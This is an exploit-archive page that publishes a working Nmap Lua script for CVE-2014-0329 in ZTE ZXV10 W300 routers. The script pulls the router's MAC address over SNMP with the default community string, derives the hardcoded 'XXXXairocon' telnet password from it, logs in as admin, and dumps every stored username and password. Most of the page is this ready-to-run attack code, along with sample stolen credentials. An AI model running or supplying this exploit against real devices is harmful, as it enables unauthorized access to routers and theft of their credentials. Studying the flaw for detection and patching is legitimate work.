Exploit the possiblities

ZTE ZXV10 W300 Hardcoded Credentials

ZTE ZXV10 W300 Hardcoded Credentials
Posted Feb 9, 2014
Authored by Cesar Neira

The ZTE ZXV10 W300 router contains hard-coded credentials that are useable for the telnet service on the device. The username is "admin" and the password is "XXXXairocon" where "XXXX" is the last four characters of the device's MAC address. The MAC address is obtainable over SNMP with community string public.

tags | exploit
MD5 | 0737c11f8245021ea2b582a4804096e7

ZTE ZXV10 W300 Hardcoded Credentials

Change Mirror Download
# Exploit Title: ZTE ZXV10 W300 router contains hardcoded credentials
# Date: 03 Feb 2014
# Exploit Author: Cesar Neira
# Vendor Homepage: http://wwwen.zte.com.cn/
# Version: ZTE ZXV10 W300 v2.1
# CVE : CVE-2014-0329
# Dork (Shodan): Basic realm="index.htm"
# References:
http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html


local nmap = require "nmap"
local stdnse = require "stdnse"
local snmp = require "snmp"
local vulns = require "vulns"

description = [[
ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the
telnet service on the device. The username is "admin" and the password is
"XXXXairocon" where "XXXX" is the last four characters of the device's MAC
address. The MAC address is obtainable over SNMP with community string public.
]]
author = "Cesar Neira"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"vuln", "exploit", "intrusive"}

---
--
-- @usage nmap -sU -sS -p U:161,T:23 --script=airocon example.org
-- @output
-- PORT STATE SERVICE
-- 23/tcp open telnet
-- 161/udp open|filtered snmp
--
-- Host script results:
-- | airocon:
-- | VULNERABLE:
-- | ZTE ZXV10 W300 router contains hardcoded credentials
-- | State: VULNERABLE (Exploitable)
-- | IDs: CVE:CVE-2014-0329
-- | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
-- | Description:
-- | ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet
-- | service on the device. The username is "admin" and the password is "XXXXairocon"
-- | where "XXXX" is the last four characters of the device's MAC address. The MAC address
-- | is obtainable over SNMP with community string public.
-- | Disclosure date: 2014-2-3
-- | Exploit results:
-- | admin:1234
-- | support:1234
-- | admin:0E91airocon
-- | References:
-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0329
-- | http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html
-- |_ http://www.kb.cert.org/vuls/id/228886

-- @args community SNMP community (Default: public)
--
---


local DEFAULT_COMMUNITY = "public"


hostrule = function(host)
local snmp_port, telnet_port

snmp_port = nmap.get_port_state(host, {number=161, protocol="udp"})
if not snmp_port and not (snmp_port.state == "open" or snmp_port.state == "open|filtered") then
return false
end

telnet_port = nmap.get_port_state(host, {number=23, protocol="tcp"})
if not telnet_port and not telnet_port.state == "open" then
return false
end

return true
end


local get_mac = function(host, community)
local socket, status, response

socket = nmap.new_socket("udp")
socket:set_timeout(5000)

status, response = socket:connect(host, 161)

if not status then
socket:close()
return status, response
end

local payload, request

request = snmp.buildGetRequest({}, ".1.3.6.1.2.1.2.2.1.6.10000")
payload = snmp.encode(snmp.buildPacket(request, 0, community))

status, response = socket:send(payload)

if not status then
socket:close()
return status, response
end

status, response = socket:receive_bytes(1)

if not status then
socket:close()
return status, response
end

socket:close()

local result
result = snmp.fetchFirst(response)

if not result then
return false, "Unexpected response value."
end

return true, stdnse.tohex(result)
end


local dump_creds = function(host, user, password)
local socket, status, response

socket = nmap.new_socket("tcp")
socket:set_timeout(5000)

status, response = socket:connect(host, 23)

if not status then
socket:close()
return status, response
end

local payload
payload = user .. "\r" .. password .. "\rsh\rlogin show\rexit\r"

status, response = socket:send(payload)

if not status then
socket:close()
return status, response
end

status, response = socket:receive_buf("exit", false)

if not status then
socket:close()
return status, response
end

socket:close()

return true, response
end


local parse_response = function(response)
local index

index = string.find(response, "Username +Password +Priority")

if not index then
return false, "Unexpected response value."
end

index = string.find(response, "\r\n", index) + 2
response = string.sub(response, index)

local result, endl, line
result = {}

index = 0
endl = string.find(response, "\r\n", index)

while endl do
line = string.sub(response, index, endl)
line = string.gsub(line, "\r", "")
line = string.gsub(line, "^ +", "")
line = string.gsub(line, " +$", "")
line = string.gsub(line, " +", " ")

local user, pass, prio
for user, pass, prio in string.gmatch(line, "([^ ]+) ([^ ]+) ([^ ]+)") do
local aux = {}
aux['username'] = user
aux['password'] = pass
aux['priority'] = prio
table.insert(result, aux)
end

index = endl + 2
endl = string.find(response, "\r\n", index)
end

return true, result
end


action = function(host)
local vuln = {
title = "ZTE ZXV10 W300 router contains hardcoded credentials",
state = vulns.STATE.NOT_VULN,
IDS = {CVE = 'CVE-2014-0329'},
risk_factor = "High",
scores = {
CVSSv2 = "9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)",
},
description = [[
ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet
service on the device. The username is "admin" and the password is "XXXXairocon"
where "XXXX" is the last four characters of the device's MAC address. The MAC address
is obtainable over SNMP with community string public.]],
references = {
"http://www.kb.cert.org/vuls/id/228886",
"http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html"
},
dates = {
disclosure = {year = 2014, month = 2, day = 3},
},
exploit_results = {},
}

local community
community = stdnse.get_script_args(SCRIPT_NAME .. ".community") or DEFAULT_COMMUNITY

local status, response

status, response = get_mac(host, community)
if not status then
return response
end

local password
password = string.upper(string.sub(response, 9)) .. "airocon"

status, response = dump_creds(host, "admin", password)
if not status then
return response
end

status, response = parse_response( response )
if not status then
return response
end

vuln.state = vulns.STATE.EXPLOIT
for _, data in pairs(response) do
table.insert(vuln.exploit_results, data.username .. ":" .. data.password)
end

return vulns.Report:new(SCRIPT_NAME, host):make_output(vuln)
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    5 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close